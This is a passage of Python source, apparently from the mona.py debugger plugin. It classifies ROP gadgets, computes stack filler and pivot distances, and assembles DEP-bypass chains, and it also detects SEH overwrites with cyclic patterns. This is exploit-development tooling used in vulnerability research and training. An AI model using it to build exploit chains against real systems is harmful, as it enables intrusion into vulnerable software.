pptr = getShortestGadget(suggestions["pop " + reg])
blocktxt2 += " 0x" + toHex(pptr)+", "+interestinggadgets[pptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
blocktxt2 += " 0xffffffff, # pop value into " + reg + "\n"
blocktxt2 += createJunk(getJunk(interestinggadgets[pptr])-4)
iptr = getShortestGadget(suggestions["inc " + reg])
blocktxt2 += " 0x" + toHex(iptr)+", "+interestinggadgets[iptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
junksize += getJunk(interestinggadgets[iptr])
else:
clearptr = getShortestGadget(suggestions["clear " + reg])
blocktxt2 += " 0x" + toHex(clearptr)+", "+interestinggadgets[clearptr].strip()+" ("+MnPointer(clearptr).belongsTo()+")\n"
junk2size = junk2size + getJunk(interestinggadgets[clearptr])-4
blocktxt2 += " 0x" + toHex(bptr)+", "+interestinggadgets[bptr].strip()+" ("+MnPointer(bptr).belongsTo()+")\n"
junk2size = junk2size + getJunk(interestinggadgets[bptr])-4
else:
negfound = False
if negfound:
blocktxt += blocktxt2
else:
blocktxt = ""
junksize = junksize + junk2size
return blocktxt,junksize
def getOffset(instructions):
offset = 0
instrparts = instructions.split("#")
retpart = instrparts[len(instrparts)-1].strip()
retparts = retpart.split(" ")
if len(retparts) > 1:
offset = hexStrToInt(retparts[1])
return offset
def getJunk(instructions):
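# computes how many bytes of filler the caller must add after this gadget : every POP eats
# 4 bytes, POPAD eats 32, ADD ESP,n eats n bytes, while PUSH/PUSHAD/SUB ESP/DEC ESP reduce the amount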
junkpop = instructions.count("POP ") * 4
junkpush = instructions.count("PUSH ") * -4
junkpushad = instructions.count("PUSHAD ") * -32
junkpopad = instructions.count("POPAD") * 32
junkinc = instructions.count("INC ESP") * 1
junkdec = instructions.count("DEC ESP") * -1
junkesp = 0
if instructions.find("ADD ESP,") > -1:
instparts = instructions.split("#")
for part in instparts:
thisinstr = part.strip()
if thisinstr.startswith("ADD ESP,"):
value = thisinstr.split(",")
junkesp += hexStrToInt(value[1])
if instructions.find("SUB ESP,") > -1:
instparts = instructions.split("#")
for part in instparts:
thisinstr = part.strip()
if thisinstr.startswith("SUB ESP,"):
value = thisinstr.split(",")
junkesp -= hexStrToInt(value[1])
junk = junkpop + junkpush + junkpopad + junkpushad + junkesp
return junk
def createJunk(size,message="filler (compensate)",alignsize=0):
bytecnt = 0
dword = 0
junktxt = ""
while bytecnt < size:
dword = 0
junktxt += " 0x"
while dword < 4 and bytecnt < size :
junktxt += "41"
dword += 1
bytecnt += 1
junktxt += ","
junktxt += toSize("",alignsize + 4 - dword)
junktxt += " # "+message+"\n"
return junktxt
def getShortestGadget(chaintypedict):
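# picks the cheapest gadget from a suggestion bucket : fewest instructions first (number of '#'
# separators), shortest disassembly text as tie-breaker, iterating in random order so repeated
# runs may return different but equally short pointers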
shortest = 100
shortestptr = 0
shortestinstr = "A" * 1000
thischaindict = chaintypedict.copy()
#shuffle dict so returning ptrs would be different each time
while thischaindict:
typeptr, thisinstr = random.choice(thischaindict.items())
if thisinstr.startswith("# XOR") or thisinstr.startswith("# OR") or thisinstr.startswith("# AD"):
thisinstr += " " # make sure we don prefer MOV or XCHG
thiscount = thisinstr.count("#")
thischaindict.pop(typeptr)
if thiscount < shortest:
shortest = thiscount
shortestptr = typeptr
shortestinstr = thisinstr
else:
if thiscount == shortest:
if len(thisinstr) < len(shortestinstr):
shortest = thiscount
shortestptr = typeptr
shortestinstr = thisinstr
return shortestptr
def isInterestingGadget(instructions):
if isAsciiString(instructions):
interesting = [
"POP E", "XCHG E", "LEA E", "PUSH E", "XOR E", "AND E", "NEG E",
"OR E", "ADD E", "SUB E", "INC E", "DEC E", "POPAD", "PUSHAD",
"SUB A", "ADD A", "NOP", "ADC E",
"SUB BH", "SUB BL", "ADD BH", "ADD BL",
"SUB CH", "SUB CL", "ADD CH", "ADD CL",
"SUB DH", "SUB DL", "ADD DH", "ADD DL",
"MOV E", "CLC", "CLD", "FS:", "FPA", "TEST "
]
notinteresting = [ "MOV ESP,EBP", "LEA ESP" ]
subregs = ["EAX","ECX","EDX","EBX","EBP","ESI","EDI"]
regs = dbglib.Registers32BitsOrder
individual = instructions.split("#")
cnt = 0
allgood = True
toskip = False
while (cnt < len(individual)-1) and allgood: # do not check last one, which is the ending instruction
thisinstr = individual[cnt].strip().upper()
if thisinstr != "":
toskip = False
foundinstruction = False
for notinterest in notinteresting:
if thisinstr.find(notinterest) > -1:
toskip= True
if not toskip:
for interest in interesting:
if thisinstr.find(interest) > -1:
foundinstruction = True
if not foundinstruction:
#check the conditional instructions
if thisinstr.find("MOV DWORD PTR DS:[E") > -1:
thisinstrparts = thisinstr.split(",")
if len(thisinstrparts) > 1:
if thisinstrparts[1] in regs:
foundinstruction = True
# other exceptions - don't combine ADD BYTE or ADD DWORD with XCHG EAX,ESI - EAX may not be writeable
#if instructions.strip().startswith("# XCHG") and (thisinstr.find("ADD DWORD") > -1 or thisinstr.find("ADD BYTE") > -1) and not instructions.strip().startswith("# XCHG EAX,ESI") :
# allow - tricky case, but sometimes needed
# foundinstruction = True
allgood = foundinstruction
else:
allgood = False
cnt += 1
return allgood
return False
def isInterestingJopGadget(instructions):
interesting = [
"POP E", "XCHG E", "LEA E", "PUSH E", "XOR E", "AND E", "NEG E",
"OR E", "ADD E", "SUB E", "INC E", "DEC E", "POPAD", "PUSHAD",
"SUB A", "ADD A", "NOP", "ADC E",
"SUB BH", "SUB BL", "ADD BH", "ADD BL",
"SUB CH", "SUB CL", "ADD CH", "ADD CL",
"SUB DH", "SUB DL", "ADD DH", "ADD DL",
"MOV E", "CLC", "CLD", "FS:", "FPA"
]
notinteresting = [ "MOV ESP,EBP", "LEA ESP" ]
regs = dbglib.Registers32BitsOrder
individual = instructions.split("#")
cnt = 0
allgood = True
popfound = False
toskip = False
# what is the jmp instruction ?
lastinstruction = individual[len(individual)-1].replace("[","").replace("+"," ").replace("]","").strip()
jmp = lastinstruction.split(' ')[1].strip().upper().replace(" ","")
regs = ["EAX","EBX","ECX","EDX","ESI","EDI","EBP","ESP"]
regs.remove(jmp)
if jmp != "ESP":
if instructions.find("POP "+jmp) > -1:
popfound=True
else:
for reg in regs:
poploc = instructions.find("POP "+reg)
if (poploc > -1):
if (instructions.find("MOV "+reg+","+jmp) > poploc) or (instructions.find("XCHG "+reg+","+jmp) > poploc) or (instructions.find("XCHG "+jmp+","+reg) > poploc):
popfound = True
allgood = popfound
return allgood
def readGadgetsFromFile(filename):
"""
Reads a mona/msf generated rop file
Arguments :
filename - the full path + filename of the source file
Return :
dictionary containing the gadgets (grouped by ending type)
"""
readopcodes = {}
srcfile = open(filename,"rb")
content = srcfile.readlines()
srcfile.close()
msffiledetected = False
#what kind of file do we have
for thisLine in content:
if thisLine.find("mod:") > -1 and thisLine.find("ver:") > -1 and thisLine.find("VA") > -1:
msffiledetected = True
break
if msffiledetected:
dbg.log("[+] Importing MSF ROP file...")
addrline = 0
ending = ""
thisinstr = ""
thisptr = ""
for thisLine in content:
if thisLine.find("[addr:") == 0:
thisLineparts = thisLine.split("]")
if addrline == 0:
thisptr = hexStrToInt(thisLineparts[0].replace("[addr: ",""))
thisLineparts = thisLine.split(" ")
thisinstrpart = thisLineparts[len(thisLineparts)-1].upper().strip()
if thisinstrpart != "":
thisinstr += " # " + thisinstrpart
ending = thisinstrpart
addrline += 1
else:
addrline = 0
if thisptr != "" and ending != "" and thisinstr != "":
if not ending in readopcodes:
readopcodes[ending] = [thisptr,thisinstr]
else:
readopcodes[ending] += ([thisptr,thisinstr])
thisptr = ""
ending = ""
thisinstr = ""
else:
dbg.log("[+] Importing Mona legacy ROP file...")
for thisLine in content:
if isAsciiString(thisLine.replace("\r","").replace("\n","")):
refpointer,instr = splitToPtrInstr(thisLine)
if refpointer != -1:
#get ending
instrparts = instr.split("#")
ending = instrparts[len(instrparts)-1]
if not ending in readopcodes:
readopcodes[ending] = [refpointer,instr]
else:
readopcodes[ending] += ([refpointer,instr])
return readopcodes
def isGoodGadgetPtr(gadget,criteria):
if gadget in CritCache:
return CritCache[gadget]
else:
gadgetptr = MnPointer(gadget)
status = meetsCriteria(gadgetptr,criteria)
CritCache[gadget] = status
return status
def getStackPivotDistance(gadget,distance=0):
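# returns the stack pivot distance (in bytes) for a gadget, or 0 when it falls outside the
# requested range; 'distance' is either a minimum value or a "min,max" string, and gadgets
# that dereference memory (DWORD PTR / [...], except FS:) are rejected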
offset = 0
distance_str = str(distance).lower()
mindistance = 0
maxdistance = 0
if "," not in distance_str:
# only mindistance
maxdistance = 99999999
mindistance = to_int(distance_str)
else:
mindistance, maxdistance = distance_str.split(",")
mindistance = to_int(mindistance)
maxdistance = to_int(maxdistance)
gadgets = filter(lambda x: x.strip(), gadget.split(" # "))
for g in gadgets:
if "ADD ESP," in g:
offset += hexStrToInt(g.split(",")[1])
elif "SUB ESP," in g:
offset -= hexStrToInt(g.split(",")[1])
elif "INC ESP" in g:
offset += 1
elif "DEC ESP" in g:
offset -= 1
elif "POP " in g:
offset += 4
elif "PUSH " in g:
offset -= 4
elif "POPAD" in g:
offset += 32
elif "PUSHAD" in g:
offset -= 32
elif ("DWORD PTR" in g or "[" in g) and "FS" not in g:
return 0
if mindistance <= offset and offset <= maxdistance:
return offset
else:
return 0
def isGoodGadgetInstr(instruction):
if isAsciiString(instruction):
forbidden = [
"???", "LEAVE", "JMP ", "CALL ", "JB ", "JL ", "JE ", "JNZ ",
"JGE ", "JNS ","SAL ", "LOOP", "LOCK", "BOUND", "SAR", "IN ",
"OUT ", "RCL", "RCR", "ROL", "ROR", "SHL", "SHR", "INT", "JECX",
"JNP", "JPO", "JPE", "JCXZ", "JA", "JB", "JNA", "JNB", "JC", "JNC",
"JG", "JLE", "MOVS", "CMPS", "SCAS", "LODS", "STOS", "REP", "REPE",
"REPZ", "REPNE", "REPNZ", "LDS", "FST", "FIST", "FMUL", "FDIVR",
"FSTP", "FST", "FLD", "FDIV", "FXCH", "JS ", "FIDIVR", "SBB",
"SALC", "ENTER", "CWDE", "FCOM", "LAHF", "DIV", "JO", "OUT", "IRET",
"FILD", "RETF","HALT","HLT","AAM","FINIT","INT3"
]
for instr in forbidden:
if instruction.upper().find(instr) > -1:
return False
return True
return False
def isGoodJopGadgetInstr(instruction):
if isAsciiString(instruction):
forbidden = [
"???", "LEAVE", "RETN", "CALL ", "JB ", "JL ", "JE ", "JNZ ",
"JGE ", "JNS ","SAL ", "LOOP", "LOCK", "BOUND", "SAR", "IN ",
"OUT ", "RCL", "RCR", "ROL", "ROR", "SHL", "SHR", "INT", "JECX",
"JNP", "JPO", "JPE", "JCXZ", "JA", "JB", "JNA", "JNB", "JC", "JNC",
"JG", "JLE", "MOVS", "CMPS", "SCAS", "LODS", "STOS", "REP", "REPE",
"REPZ", "REPNE", "REPNZ", "LDS", "FST", "FIST", "FMUL", "FDIVR",
"FSTP", "FST", "FLD", "FDIV", "FXCH", "JS ", "FIDIVR", "SBB",
"SALC", "ENTER", "CWDE", "FCOM", "LAHF", "DIV", "JO", "OUT", "IRET",
"FILD", "RETF","HALT","HLT","AAM","FINIT"
]
for instr in forbidden:
if instruction.upper().find(instr) > -1:
return False
return True
return False
def isGadgetEnding(instruction,endings,verbosity=False):
for ending in endings:
if instruction.lower().find(ending.lower()) > -1:
return True
return False
def getRopSuggestion(ropchains,allchains):
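# classifies the collected gadgets into functional buckets ("pushad", "pickup pointer into <reg>",
# "move <reg> -> <reg>", ...) keyed by the strings the chain builder looks up later on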
suggestions={}
# pushad
# ======================
regs = ["EAX","EBX","ECX","EDX","EBP","ESI","EDI"]
pushad_allowed = [ "INC ","DEC ","OR ","XOR ","LEA ","ADD ","SUB ", "PUSHAD", "RETN ", "NOP", "POP ","PUSH EAX","PUSH EDI","ADC ","FPATAN","MOV E" , "TEST ", "CMP "]
for r in regs:
pushad_allowed.append("MOV "+r+",DWORD PTR DS:[ESP") #stack
pushad_allowed.append("MOV "+r+",DWORD PTR SS:[ESP") #stack
pushad_allowed.append("MOV "+r+",DWORD PTR DS:[ESI") #virtualprotect
pushad_allowed.append("MOV "+r+",DWORD PTR SS:[ESI") #virtualprotect
pushad_allowed.append("MOV "+r+",DWORD PTR DS:[EBP") #stack
pushad_allowed.append("MOV "+r+",DWORD PTR SS:[EBP") #stack
for r2 in regs:
pushad_allowed.append("MOV "+r+","+r2)
pushad_allowed.append("XCHG "+r+","+r2)
pushad_allowed.append("LEA "+r+","+r2)
pushad_notallowed = ["POP ESP","POPAD","PUSH ESP","MOV ESP","ADD ESP", "INC ESP","DEC ESP","XOR ESP","LEA ESP","SS:","DS:"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find("PUSHAD") == 2:
# does chain only contain allowed instructions
# one pop is allowed, as long as it's not pop esp
# push edi and push eax are allowed too (ropnop)
if gadgetinstructions.count("POP ") < 2 and suggestedGadgetCheck(gadgetinstructions,pushad_allowed,pushad_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
if not "pushad" in suggestions:
suggestions["pushad"] = toadd
else:
suggestions["pushad"] = mergeOpcodes(suggestions["pushad"],toadd)
# pick up a pointer
# =========================
pickedupin = []
resulthash = ""
allowedpickup = True
for r in regs:
for r2 in regs:
pickup_allowed = ["NOP","RETN ","INC ","DEC ","OR ","XOR ","MOV ","LEA ","ADD ","SUB ","POP","ADC ","FPATAN", "TEST ", "CMP "]
pickup_target = []
pickup_notallowed = []
pickup_allowed.append("MOV "+r+",DWORD PTR SS:["+r2+"]")
pickup_allowed.append("MOV "+r+",DWORD PTR DS:["+r2+"]")
pickup_target.append("MOV "+r+",DWORD PTR SS:["+r2+"]")
pickup_target.append("MOV "+r+",DWORD PTR DS:["+r2+"]")
pickup_notallowed = ["POP "+r, "MOV "+r+",E", "LEA "+r+",E", "MOV ESP", "XOR ESP", "LEA ESP", "MOV DWORD PTR", "DEC ESP"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
allowedpickup = False
for allowed in pickup_target:
if gadgetinstructions.find(allowed) == 2 and gadgetinstructions.count("DWORD PTR") == 1:
allowedpickup = True
break
if allowedpickup:
if suggestedGadgetCheck(gadgetinstructions,pickup_allowed,pickup_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
resulthash = "pickup pointer into "+r.lower()
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
if not r in pickedupin:
pickedupin.append(r)
if len(pickedupin) == 0:
for r in regs:
for r2 in regs:
pickup_allowed = ["NOP","RETN ","INC ","DEC ","OR ","XOR ","MOV ","LEA ","ADD ","SUB ","POP", "ADC ","FPATAN", "TEST ", "CMP "]
pickup_target = []
pickup_notallowed = []
pickup_allowed.append("MOV "+r+",DWORD PTR SS:["+r2+"+")
pickup_allowed.append("MOV "+r+",DWORD PTR DS:["+r2+"+")
pickup_target.append("MOV "+r+",DWORD PTR SS:["+r2+"+")
pickup_target.append("MOV "+r+",DWORD PTR DS:["+r2+"+")
pickup_notallowed = ["POP "+r, "MOV "+r+",E", "LEA "+r+",E", "MOV ESP", "XOR ESP", "LEA ESP", "MOV DWORD PTR"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
allowedpickup = False
for allowed in pickup_target:
if gadgetinstructions.find(allowed) == 2 and gadgetinstructions.count("DWORD PTR") == 1:
allowedpickup = True
break
if allowedpickup:
if suggestedGadgetCheck(gadgetinstructions,pickup_allowed,pickup_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
resulthash = "pickup pointer into "+r.lower()
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
if not r in pickedupin:
pickedupin.append(r)
# move pointer into another pointer
# =================================
for reg in regs: #from
for reg2 in regs: #to
if reg != reg2:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "XCHG ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:","PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
# if we didn't find any, expand the search
if not ("move " + reg + " -> " + reg2).lower() in suggestions:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "XCHG ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
reg2 = "ESP" #special case
if reg != reg2:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "MOV ", "XCHG ", "ADC ", "TEST ", "CMP "]
moveptr_notallowed = ["ADD "+reg2, "ADC "+reg2, "POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:","PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
# xor pointer into another pointer
# =================================
for reg in regs: #from
for reg2 in regs: #to
if reg != reg2:
xorptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "XCHG ", "ADC ","FPATAN", "TEST ", "CMP "]
xorptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:","PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("XOR",reg,reg2,ropchains,xorptr_allowed,xorptr_notallowed))
# get stack pointer
# =================
for reg in regs:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ","MOV ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP ESP","MOV ESP,","XCHG ESP,","XOR ESP","LEA ESP,","AND ESP", "ADD ESP", "],","SUB ESP","OR ESP"]
moveptr_notallowed.append("POP "+reg)
moveptr_notallowed.append("MOV "+reg)
moveptr_notallowed.append("XCHG "+reg)
moveptr_notallowed.append("XOR "+reg)
moveptr_notallowed.append("LEA "+reg)
moveptr_notallowed.append("AND "+reg)
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE","ESP",reg,allchains,moveptr_allowed,moveptr_notallowed))
# add something to register
# =========================
for reg in regs: #from
for reg2 in regs: #to
if reg != reg2:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("ADD",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
# add value to register
# =========================
for reg in regs: #to
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ", "SUB ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg,"MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("ADDVAL",reg,reg,ropchains,moveptr_allowed,moveptr_notallowed))
#inc reg
# =======
for reg in regs:
moveptr_allowed = ["NOP","RETN","POP ","INC " + reg,"DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ", "SUB ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg,"MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP", "DEC "+reg]
suggestions = mergeOpcodes(suggestions,getRegToReg("INC",reg,reg,ropchains,moveptr_allowed,moveptr_notallowed))
#dec reg
# =======
for reg in regs:
moveptr_allowed = ["NOP","RETN","POP ","DEC " + reg,"INC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ", "SUB ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg,"MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP", "INC "+reg]
suggestions = mergeOpcodes(suggestions,getRegToReg("DEC",reg,reg,ropchains,moveptr_allowed,moveptr_notallowed))
#popad reg
# =======
popad_allowed = ["POPAD","RETN","INC ","DEC ","OR ","XOR ","ADD ","AND ", "ADC ", "SUB ","FPATAN","POP ", "TEST ", "CMP "]
popad_notallowed = ["POP ESP","PUSH ESP","MOV ESP","ADD ESP", "INC ESP","DEC ESP","XOR ESP","LEA ESP","SS:","DS:"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find("POPAD") == 2:
if suggestedGadgetCheck(gadgetinstructions,popad_allowed,popad_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
if not "popad" in suggestions:
suggestions["popad"] = toadd
else:
suggestions["popad"] = mergeOpcodes(suggestions["popad"],toadd)
# pop
# ===
for reg in regs:
pop_allowed = "POP "+reg+" # RETN"
pop_notallowed = []
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find(pop_allowed) == 2:
resulthash = "pop "+reg.lower()
toadd = {}
toadd[gadget] = gadgetinstructions
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
# check if we have a pop for each reg
for reg in regs:
r = reg.lower()
if not "pop "+r in suggestions:
pop_notallowed = ["MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP", "DEC "+reg, "INC " + reg,"PUSH ","XOR "+reg]
for rchain in ropchains:
rparts = ropchains[rchain].strip().split("#")
chainok = False
if rparts[1].strip() == "POP " + reg:
chainok = True
if chainok:
for rpart in rparts:
thisinstr = rpart.strip()
for pna in pop_notallowed:
if thisinstr.find(pna) > -1:
chainok = False
break
if chainok:
toadd = {}
toadd[rchain] = thisinstr
if not "pop " + r in suggestions:
suggestions["pop " + r] = toadd
else:
suggestions["pop " + r] = mergeOpcodes(suggestions["pop " + r],toadd)
# neg
# ===
for reg in regs:
neg_allowed = "NEG "+reg+" # RETN"
neg_notallowed = []
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find(neg_allowed) == 2:
resulthash = "neg "+reg.lower()
toadd = {}
toadd[gadget] = gadgetinstructions
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
# empty
# =====
for reg in regs:
empty_allowed = ["XOR "+reg+","+reg+" # RETN","MOV "+reg+",FFFFFFFF # INC "+reg+" # RETN", "SUB "+reg+","+reg+" # RETN", "PUSH 0 # POP "+reg + " # RETN", "IMUL "+reg+","+reg+",0 # RETN"]
empty_notallowed = []
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
for empty in empty_allowed:
if gadgetinstructions.find(empty) == 2:
resulthash = "clear "+reg.lower()
toadd = {}
toadd[gadget] = gadgetinstructions
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
return suggestions
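# Helper for getRopSuggestion : find gadgets that transfer or modify registers.
# 'type' selects the operation : MOVE / XOR / ADD (register to register),
# ADDVAL (add a constant), INC or DEC.
# Returns a dictionary { suggestion name : { pointer : gadget string } }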
def getRegToReg(type,fromreg,toreg,ropchains,moveptr_allowed,moveptr_notallowed):
moveptr = []
instrwithout = ""
toreg = toreg.upper()
srcval = False
resulthash = ""
musthave = ""
if type == "MOVE":
moveptr.append("MOV "+toreg+","+fromreg)
moveptr.append("LEA "+toreg+","+fromreg)
#if not (fromreg == "ESP" or toreg == "ESP"):
moveptr.append("XCHG "+fromreg+","+toreg)
moveptr.append("XCHG "+toreg+","+fromreg)
moveptr.append("PUSH "+fromreg)
moveptr.append("ADD "+toreg+","+fromreg)
moveptr.append("ADC "+toreg+","+fromreg)
moveptr.append("XOR "+toreg+","+fromreg)
if type == "XOR":
moveptr.append("XOR "+toreg+","+fromreg)
if type == "ADD":
moveptr.append("ADD "+toreg+","+fromreg)
moveptr.append("ADC "+toreg+","+fromreg)
moveptr.append("XOR "+toreg+","+fromreg)
if type == "ADDVAL":
moveptr.append("ADD "+toreg+",")
moveptr.append("ADC "+toreg+",")
moveptr.append("XOR "+toreg+",")
moveptr.append("SUB "+toreg+",")
srcval = True
resulthash = "add value to " + toreg
if type == "INC":
moveptr.append("INC "+toreg)
resulthash = "inc " + toreg
if type == "DEC":
moveptr.append("DEC "+toreg)
resulthash = "dec " + toreg
results = {}
if resulthash == "":
resulthash = type +" "+fromreg+" -> "+toreg
resulthash = resulthash.lower()
for tocheck in moveptr:
origtocheck = tocheck
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find(tocheck) == 2:
moveon = True
if srcval:
#check if src is a value
inparts = gadgetinstructions.split(",")
if len(inparts) > 1:
subinparts = inparts[1].split(" ")
if isHexString(subinparts[0].strip()):
tocheck = tocheck + subinparts[0].strip()
else:
moveon = False
if moveon:
instrwithout = gadgetinstructions.replace(tocheck,"")
if tocheck == "PUSH "+fromreg:
popreg = instrwithout.find("POP "+toreg)
popall = instrwithout.find("POP")
#make sure pop matches push
nrpush = gadgetinstructions.count("PUSH ")
nrpop = gadgetinstructions.count("POP ")
pushpopmatch = False
if nrpop >= nrpush:
pushes = []
pops = []
ropparts = gadgetinstructions.split(" # ")
pushindex = 0
popindex = 0
cntpush = 0
cntpop = nrpush
for parts in ropparts:
if parts.strip() != "":
if parts.strip().find("PUSH ") > -1:
pushes.append(parts)
if parts.strip() == "PUSH "+fromreg:
cntpush += 1
if parts.strip().find("POP ") > -1:
pops.append(parts)
if parts.strip() == "POP "+toreg:
cntpop -= 1
if cntpush == cntpop:
#dbg.log("%s : POPS : %d, PUSHES : %d, pushindex : %d, popindex : %d" % (gadgetinstructions,len(pops),len(pushes),pushindex,popindex))
#dbg.log("push at %d, pop at %d" % (cntpush,cntpop))
pushpopmatch = True
if (popreg == popall) and instrwithout.count("POP "+toreg) == 1 and pushpopmatch:
toadd={}
toadd[gadget] = gadgetinstructions
if not resulthash in results:
results[resulthash] = toadd
else:
results[resulthash] = mergeOpcodes(results[resulthash],toadd)
else:
if suggestedGadgetCheck(instrwithout,moveptr_allowed,moveptr_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
if not resulthash in results:
results[resulthash] = toadd
else:
results[resulthash] = mergeOpcodes(results[resulthash],toadd)
tocheck = origtocheck
return results
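# Verify that every instruction in the chain (except the final ending instruction)
# matches at least one entry from 'allowed' and none from 'notallowed'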
def suggestedGadgetCheck(instructions,allowed,notallowed):
individual = instructions.split("#")
cnt = 0
allgood = True
toskip = False
while (cnt < len(individual)-1) and allgood: # do not check last one, which is the ending instruction
thisinstr = individual[cnt].upper()
if thisinstr.strip() != "":
toskip = False
foundinstruction = False
for notok in notallowed:
if thisinstr.find(notok) > -1:
toskip= True
if not toskip:
for ok in allowed:
if thisinstr.find(ok) > -1:
foundinstruction = True
allgood = foundinstruction
else:
allgood = False
cnt += 1
return allgood
def dumpMemoryToFile(address,size,filename):
"""
Dump 'size' bytes of memory to a file
Arguments:
	address  - the address to read from
	size     - the number of bytes to read
	filename - the name of the file to write the bytes to
Return:
Boolean - True if the write succeeded
"""
WRITE_SIZE = 10000
dbg.log("Dumping %d bytes from address 0x%08x to %s..." % (size, address, filename))
out = open(filename,'wb')
# write by increments of 10000 bytes
current = 0
while current < size :
bytesToWrite = size - current
if ( bytesToWrite >= WRITE_SIZE):
bytes = dbg.readMemory(address+current,WRITE_SIZE)
out.write(bytes)
current += WRITE_SIZE
else:
bytes = dbg.readMemory(address+current,bytesToWrite)
out.write(bytes)
current += bytesToWrite
out.close()
return True
def checkSEHOverwrite(address, nseh, seh):
"""
Checks if the current SEH record is overwritten
with a cyclic pattern
Input : address of SEH record, nseh value, seh value
Returns : array. Non empty array = SEH is overwritten
Array contents :
[0] : type (normal, upper, lower, unicode)
[1] : offset to nseh
"""
pattypes = ["normal","upper","lower","unicode"]
overwritten = []
global silent
silent = True
fullpattern = createPattern(50000,{})
for pattype in pattypes:
regpattern = fullpattern
hexpat = toHex(seh)
hexpat = toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[2]+hexpat[3])+toAscii(hexpat[0]+hexpat[1])
factor = 1
goback = 4
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
hexpat = dbg.readMemory(address,8)
hexpat = hexpat.replace('\x00','')
goback = 2
offset = regpattern.find(hexpat)-goback
thissize = 0
if offset > -1:
thepointer = MnPointer(address)
if thepointer.isOnStack():
thissize = getPatternLength(address+4,pattype)
if thissize > 0:
overwritten = [pattype,offset]
break
silent = False
return overwritten
def goFindMSP(distance = 0,args = {}):
"""
Finds all references to cyclic pattern in memory
Arguments:
